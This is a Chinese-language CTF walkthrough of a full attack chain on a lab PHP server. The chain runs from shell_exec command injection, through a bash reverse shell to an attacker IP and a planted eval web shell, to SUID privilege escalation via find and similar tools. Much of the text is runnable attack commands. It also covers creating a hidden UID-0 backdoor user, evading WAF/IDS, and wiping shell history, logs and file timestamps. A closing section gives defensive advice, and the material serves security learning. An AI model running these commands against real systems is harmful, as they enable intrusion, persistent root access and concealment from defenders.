从Web命令注入到Linux SUID提权：一次完整的渗透测试实战解析

1. 项目概述：一次从Web漏洞到系统权限的完整攻防演练

最近在带新人复盘一些CTF题目，发现很多朋友对RCE（远程代码执行）漏洞的利用，以及后续的权限提升路径，理解得还不够透彻。正好手头有一个典型的NewStarCTF环境，它完美地串联了从Web层面的shell_exec函数RCE，到利用系统SUID权限位进行本地提权的完整链条。这不仅仅是解一道题，更是一次贴近真实渗透测试场景的实战演练。整个过程会涉及到Web漏洞的发现与利用、反弹Shell的稳定建立、系统信息枚举，以及最终利用配置不当的SUID程序拿到最高权限。对于想深入理解“漏洞利用链”和“权限提升”的朋友来说，这是一个绝佳的练手案例。

简单来说，这个项目就是模拟攻击者发现一个网站存在命令执行漏洞后，如何一步步从获得一个低权限的Web Shell，最终“晋升”为服务器的root管理员。我们会使用蚁剑（AntSword）这类常见的Web管理工具来稳定我们的连接，并深入Linux系统内部，寻找那些因SUID位设置而可能被滥用的程序。无论你是CTF爱好者、安全初学者，还是想巩固Web渗透与内网渗透知识的安全从业者，跟着走一遍这个流程，都能对“攻击者视角”有一个更清晰、更落地的认识。

2. 靶场环境与核心漏洞点剖析

2.1 靶场场景与入口点定位

我们面对的靶场是一个典型的LAMP（Linux + Apache + MySQL + PHP）架构的Web应用。前端页面看起来可能平平无奇，或许是一个简单的命令执行功能，或者是一个文件上传点，但核心问题往往藏在后端代码的逻辑缺陷里。在这个NewStarCTF场景中，漏洞的入口非常经典：一个调用了shell_exec、system、exec或passthru等危险函数的PHP接口。

比如，页面上可能有一个输入框，让你“Ping一个地址”或者“执行系统命令”。后端代码可能未经任何过滤，直接拼接了用户输入。原始代码可能类似于：

<?php $cmd = $_GET['command']; echo shell_exec($cmd); ?>

或者，为了增加一点难度，开发者可能做了一些简单的过滤，比如用str_replace过滤了空格、分号等字符，但过滤规则不严谨，存在绕过可能。我们的第一步，就是通过参数fuzz（模糊测试），确认这个命令执行点是否存在，以及它的过滤规则是什么。常用的测试payload包括127.0.0.1; whoami、127.0.0.1 && id、127.0.0.1 | cat /etc/passwd等，通过观察回显来判断命令是否执行成功。

注意：在实际CTF或授权测试中，务必确认测试行为在合法合规的范围内进行。本环境为专为学习搭建的靶场。

2.2 shell_exec函数与命令注入原理

为什么shell_exec这类函数如此危险？这需要从PHP执行系统命令的机制说起。当PHP调用shell_exec(“ls -la”)时，它会通过PHP解释器请求操作系统（这里是Linux）的Shell（通常是/bin/bash或/bin/sh）去执行ls -la这条命令。Shell是用户与操作系统内核交互的桥梁，拥有巨大的权力。

漏洞产生的根本原因在于“数据与代码的混淆”。用户输入的参数（$_GET[‘command’]）本应被视为“数据”，但代码却将其直接拼接成要执行的“代码”字符串。例如，用户输入127.0.0.1; cat /etc/passwd，拼接后的命令变为ping -c 3 127.0.0.1; cat /etc/passwd。在Shell中，分号;是命令分隔符，这意味着Shell会依次执行两条命令：先执行ping，然后执行cat /etc/passwd，并将结果返回。攻击者就此实现了任意命令执行。

常见的命令注入绕过技巧包括：

• 使用不同的连接符：&&（前一条成功则执行后一条）、||（前一条失败则执行后一条）、|（管道符）。
• 空格绕过：用${IFS}、$IFS$9、<、>重定向符代替空格。
• 命令分隔符绕过：除了;，还可以用%0a（换行符）、%0d（回车符）。
• 黑名单字符串绕过：通过拼接、编码、通配符等方式。例如，/???/??t可能匹配到/bin/cat。

理解这些原理，是我们成功利用RCE的第一步。在本次靶场中，我们假设已经通过简单的; id测试，确认了存在无过滤或可绕过的shell_exec漏洞点。

3. 从RCE到稳定Shell：蚁剑的连接与管理

3.1 为什么需要蚁剑？反弹Shell的建立

通过RCE执行id或ls看到回显，这只是第一步。一个在Web页面上的命令执行是不稳定且功能受限的。它没有交互式终端，无法方便地上传下载文件，执行复杂命令也很麻烦。因此，我们需要建立一个“反弹Shell”（Reverse Shell）。

反弹Shell的原理是：让靶机（被攻击服务器）主动向我们的攻击机（Kali Linux或本机）的某个监听端口发起一个连接，并将自己的Shell（如/bin/bash）绑定到这个连接上。这样，我们就在攻击机上获得了一个指向靶机的、功能完整的交互式Shell。

常用的反弹Shell命令有很多，比如用bash、nc（netcat）、python、php等。一个经典的bash反弹命令是：

bash -i >& /dev/tcp/攻击机IP/监听端口 0>&1

这条命令的意思是：创建一个交互式bash（-i），将其标准输出和标准错误（>&）重定向到对攻击机TCP端口的连接，同时将标准输入（0>&1）也重定向到同一个连接，从而形成一个完整的Shell通道。

我们在攻击机上用nc -lvnp 4444监听4444端口，然后在靶场的RCE点执行上面的反弹Shell命令（替换IP和端口），就能获得一个反向连接。然而，这种nc或bash反弹的Shell往往是“哑”的（没有TTY），不稳定，容易中断。这就需要进一步升级为完全交互式的TTY Shell，可以使用python -c ‘import pty; pty.spawn(“/bin/bash”)’等命令。

3.2 使用蚁剑实现可视化与持久化管理

手动用nc监听和管理Shell效率较低。蚁剑（AntSword）作为一个图形化的Web Shell管理工具，极大地简化了这个过程。它的本质是一个本地运行的Web服务器，通过一个浏览器界面来管理多个Shell连接。对于PHP站点，它通常通过上传一个特制的PHP脚本（“一句话木马”或“小马”）作为后门，然后蚁剑客户端通过HTTP协议与这个脚本通信，来执行命令、管理文件。

我们的操作步骤通常是：

1. 生成后门脚本：在蚁剑中，可以方便地生成各种语言的一句话木马。对于PHP，经典的一句话是<?php @eval($_POST[‘ant’]);?>。eval函数会执行POST参数ant传递过来的PHP代码。
2. 上传后门：利用已有的RCE漏洞，将这句话木马写入靶机Web目录下的一个文件中。例如，使用echo命令：echo ‘<?php @eval($_POST[“ant”]);?>’ > /var/www/html/shell.php。如果遇到特殊字符被转义，可以尝试使用base64解码写入等方式绕过。
3. 蚁剑连接：在蚁剑中添加一个新的Shell，URL填写http://靶机IP/shell.php，连接密码填写ant（与后门代码中的POST参数名一致），编码器一般选择default（默认）。
4. 虚拟终端：连接成功后，蚁剑会提供一个虚拟终端，可以像在本地一样执行命令，并稳定地显示结果。它还集成了文件管理、数据库管理、反弹Shell等多种插件，功能非常强大。

实操心得：在实际环境中，上传的文件名和路径要尽量隐蔽，比如混入图片目录，或使用.htaccess配合.php.jpg双扩展名绕过检查。同时，蚁剑的流量特征比较明显，在实战中可能需要配合自定义编码器或加密来规避WAF和IDS的检测。但在CTF靶场中，我们以学习和理解流程为主。

通过蚁剑，我们获得了一个稳定、图形化、功能强大的Web Shell管理界面，为后续深入的权限提升操作打下了坚实的基础。

4. 信息收集与SUID提权原理深度解析

4.1 立足之后：系统的全面侦察

拿到一个Web Shell后，我们通常只是一个低权限用户，比如www-data（运行Apache/Nginx的用户）或某个普通用户。我们的目标是root。在发起提权攻击前，必须对当前环境进行彻底的信息收集，这就像战士上战场前要熟悉地形。

以下是一些关键的信息收集命令：

• 当前用户与权限：id命令查看当前用户的UID、GID以及所属组。whoami确认用户名。
• 系统信息：uname -a查看内核版本，cat /etc/os-release或lsb_release -a查看发行版信息。内核漏洞是提权的重要途径。
• 网络信息：ifconfig或ip addr查看网络配置和内网IP段。netstat -antp或ss -tlnp查看网络连接和监听端口，寻找内部服务。
• 进程信息：ps aux或top查看运行进程，寻找以root身份运行的可疑或脆弱服务。
• 计划任务：crontab -l查看当前用户的计划任务，ls -la /etc/cron*查看系统计划任务，可能有不安全的脚本。
• 用户与历史：cat /etc/passwd查看系统用户，cat /etc/shadow（需要root）查看密码哈希。history查看当前用户的命令历史。
• 敏感文件与配置：寻找配置文件（*.conf、*.ini）、数据库连接文件、备份文件（*.bak、*.tar.gz）、SSH密钥（~/.ssh/id_rsa）等。

4.2 SUID权限位：被忽视的提权捷径

在Linux中，SUID（Set User ID）是一个特殊的文件权限位。当一个可执行文件被设置了SUID位后，任何用户在执行这个文件时，都将以该文件所有者的权限来运行，而不是执行者的权限。

用ls -l命令查看时，SUID位表现为所有者执行权限位上的s。例如：

-rwsr-xr-x 1 root root 34888 May 17 2021 /usr/bin/passwd

这里的/usr/bin/passwd程序所有者是root，并且设置了SUID位（rws中的s）。这意味着，当普通用户执行passwd命令修改自己的密码时，该进程实际上拥有root权限，从而能够写入/etc/shadow这个普通用户无法直接修改的系统文件。

SUID的设计初衷是为了方便用户完成一些需要特权的操作（如修改密码、ping需要RAW Socket）。但是，如果管理员错误地将某些功能强大或存在漏洞的二进制文件设置了SUID位，就可能成为攻击者提权的跳板。例如，如果/bin/bash被设置了SUID位，那么任何用户执行bash就能直接获得一个root shell。

寻找系统中潜在的SUID提权机会，是Linux本地提权中最常见、也往往是最快的方法之一。我们可以使用以下命令来查找所有设置了SUID位的可执行文件：

find / -type f -perm -4000 2>/dev/null

或者更详细地：

find / -type f -perm -u=s 2>/dev/null

这条命令会在整个文件系统（/）中搜索权限模式包含4000（即SUID位）的普通文件（-type f），并将所有错误信息（如“权限不足”）重定向到/dev/null，只显示有权限查看的结果。

5. 实战SUID提权：案例分析与手工利用

5.1 枚举可疑的SUID程序

运行find / -perm -u=s -type f 2>/dev/null后，我们会得到一个列表。常见的、正常的SUID程序包括/usr/bin/passwd,/usr/bin/sudo,/usr/bin/pkexec,/usr/bin/chsh,/bin/mount,/bin/su,/bin/ping等。我们的目标是找出那些不常见、功能可能被滥用的SUID程序。

在本次NewStarCTF靶场中，经过枚举，我们可能发现一个不寻常的程序，例如：

• /usr/bin/find：这是一个非常经典的SUID提权向量。find命令功能强大，本身并不需要SUID位，但如果被错误设置，可以利用其-exec参数执行任意命令。
• /usr/bin/vim/vi：如果文本编辑器以SUID root运行，可以在其中执行Shell命令（:!bash）或修改敏感系统文件（/etc/passwd,/etc/sudoers）。
• /usr/bin/less/more：文件阅读器，同样可以在其中执行Shell命令。
• /usr/bin/nmap（旧版本）：老版本的nmap有一个交互模式（nmap --interactive），在其中可以执行!bash来逃逸到Shell。
• /usr/bin/awk：AWK是一种强大的文本处理语言，可以执行系统命令。
• 自定义脚本或程序：靶场可能放置了一个编译好的、有漏洞的C程序，并设置了SUID位。

假设我们在靶场中发现了/usr/bin/find被设置了SUID位，并且所有者是root。

5.2 利用find命令进行SUID提权

find命令的-exec参数允许对找到的每个文件执行指定的命令。由于find以SUID root运行，那么通过-exec执行的命令也将以root权限运行。

提权步骤：

1. 确认SUID位：在获得的Web Shell或反弹Shell中执行：

   ls -l /usr/bin/find

   确认输出中包含-rwsr-xr-x，所有者是root。

2. 利用-exec参数执行命令：

   /usr/bin/find /etc/passwd -exec whoami \;

   这条命令的意思是：在/etc目录下查找名为passwd的文件，对找到的第一个文件（就是它自己）执行whoami命令。\;是-exec参数的结束符。如果执行后返回root，则证明可以利用。

3. 获取Root Shell： 我们可以通过-exec参数来启动一个bash shell：

   /usr/bin/find /etc/passwd -exec /bin/bash -p \;

   这里的关键是-p参数。在bash中，-p参数告诉shell在启动时保留有效的用户ID（即SUID赋予的root权限）。如果不加-p，bash可能会丢弃特权，导致提权失败。

   执行上述命令后，我们应当会获得一个root权限的bash提示符（#）。可以通过id和whoami再次验证。

其他常见SUID程序的利用方法：

• vim/vi:

  vim /etc/passwd # 然后输入 :!bash 或 :sh # 或者直接 vim -c ‘:!bash’

• less/more:

  less /etc/passwd # 然后在less界面中输入 !bash # 或者 more /etc/passwd !bash

• awk:

  awk ‘BEGIN {system(“/bin/bash”)}’

• nmap（旧版本，5.x以前）:

  nmap --interactive nmap> !bash

注意事项：并非所有设置了SUID的程序都能直接提权。有些程序内部有严格的权限检查，会主动放弃SUID特权。此外，现代Linux系统（如使用systemd的发行版）的/proc/sys/fs/suid_dumpable等安全配置也可能影响SUID程序的利用。因此，在尝试前，最好先通过-exec whoami或类似命令测试命令是否真的以root身份执行。

6. 提权后的操作与痕迹清理

6.1 巩固权限与扩大战果

成功获得root Shell后，我们的工作并未结束。一个专业的渗透测试人员或CTF选手，需要思考如何巩固访问权限，并探索是否能有更大收获。

1. 添加后门用户：最直接的方式是添加一个属于root组或拥有sudo权限的隐藏用户。

   # 方法一：直接编辑/etc/passwd和/etc/shadow（需谨慎） echo “backdoor:$(openssl passwd -1 -salt abc 123456):0:0:root:/root:/bin/bash” >> /etc/passwd # 这条命令创建一个用户名为backdoor，密码为123456，UID和GID都为0（root）的用户。 # 方法二：使用useradd命令（更规范） useradd -o -u 0 -g 0 -G root -s /bin/bash -d /root backdoor echo “backdoor:123456” | chpasswd

2. 获取SSH密钥：查看/root/.ssh/目录下是否有id_rsa或authorized_keys，获取root的SSH私钥可以让我们直接通过SSH登录，更加稳定隐蔽。

3. 查看敏感信息：浏览/root目录下的文件、历史记录（/root/.bash_history）、数据库配置文件、应用源代码等，寻找更多敏感数据（Flag、密钥、内部信息等）。

4. 内网探测：如果这是一台内网机器，利用root权限可以更方便地进行ARP扫描、端口扫描，向网络深处横向移动。

6.2 清理入侵痕迹（仅限授权测试与CTF）

在真实的渗透测试（获得明确授权）或CTF比赛中，为了不影响其他选手或维护靶场环境，有时需要进行简单的痕迹清理。请注意，在非授权环境中，这是违法行为。

1. Shell历史记录：清除当前用户和root的bash历史。

   # 清除当前历史 history -c # 清除历史文件 echo “” > ~/.bash_history echo “” > /root/.bash_history # 或者直接设置不记录历史 export HISTSIZE=0 export HISTFILESIZE=0

2. 日志文件：Linux系统的日志主要存放在/var/log/目录下。需要关注的日志包括：

   • /var/log/auth.log或/var/log/secure：认证相关日志（SSH登录、sudo使用等）。
   • /var/log/apache2/access.log和error.log：Apache访问和错误日志。
   • /var/log/nginx/access.log和error.log：Nginx日志。
   • /var/log/syslog或/var/log/messages：系统通用日志。 可以使用sed或直接删除相关行，但更高级的做法是使用日志注入或干扰。在CTF中，通常不需要处理。

3. 文件时间戳：使用touch命令修改我们创建的恶意文件（如一句话木马shell.php）的时间戳，使其与Web目录下其他文件的时间保持一致，避免被基于mtime（修改时间）的排查发现。

4. 删除上传的Web Shell：在离开前，记得删除通过RCE上传的一句话木马文件。

   rm -f /var/www/html/shell.php

7. 防御视角：如何避免此类攻击链

站在防守方（开发者和运维人员）的角度，回顾整个攻击链条，我们可以总结出多层防御措施：

1. 杜绝命令注入（RCE）：

   • 输入验证与过滤：对用户输入进行严格的“白名单”验证，只允许预期的字符集（如IP地址只允许数字和点）。避免使用黑名单，总有漏网之鱼。
   • 参数化调用或使用安全函数：在PHP中，尽可能使用escapeshellarg()或escapeshellcmd()函数对命令参数进行转义。更好的做法是，避免使用shell_exec、system等函数，寻找不需要调用系统命令的纯PHP实现方案。
   • 最小权限原则：运行Web服务的用户（如www-data）应该被严格限制权限，不能执行不必要的系统命令，其家目录和可写目录应严格隔离。

2. 安全的SUID管理：

   • 定期审计：使用find / -perm -4000定期检查系统中的SUID文件，移除任何非绝对必要的SUID位。问自己：这个程序真的需要SUID吗？
   • 使用能力机制（Capabilities）：对于需要部分特权的程序（如ping需要CAP_NET_RAW），使用Linux的Capabilities机制替代粗放的SUID，实现更细粒度的权限控制。例如：setcap cap_net_raw+ep /bin/ping。
   • 加固内核参数：设置/proc/sys/fs/suid_dumpable为0，防止SUID程序在错误时产生可供利用的核心转储。

3. 系统与网络层加固：

   • 及时更新：保持操作系统、Web服务器、数据库及所有应用软件的最新版本，修补已知漏洞。
   • 最小化安装与服务：关闭不必要的服务和端口，减少攻击面。
   • 使用防火墙：配置严格的iptables或firewalld规则，限制内外网访问。
   • 部署WAF与IDS：Web应用防火墙（WAF）可以有效拦截常见的SQL注入、命令注入等攻击流量。入侵检测系统（IDS）可以帮助发现异常行为。

4. 纵深防御与监控：

   • 文件完整性监控：使用AIDE、Tripwire等工具监控关键系统文件和Web目录的变更。
   • 集中化日志审计：将系统、应用、安全设备的日志集中收集到安全的日志服务器（如ELK Stack），便于关联分析和事后溯源。
   • 定期渗透测试与代码审计：主动发现自身系统的安全隐患，在攻击者之前将其修复。

通过这个从RCE到SUID提权的完整实战，我们不仅学习了一套攻击方法，更重要的是理解了每一环背后的原理和对应的防御思路。安全是一个持续的过程，攻防两端的知识相辅相成。在CTF靶场中安全地练习这些技术，能让我们在真实工作中更好地构建和维护安全的系统。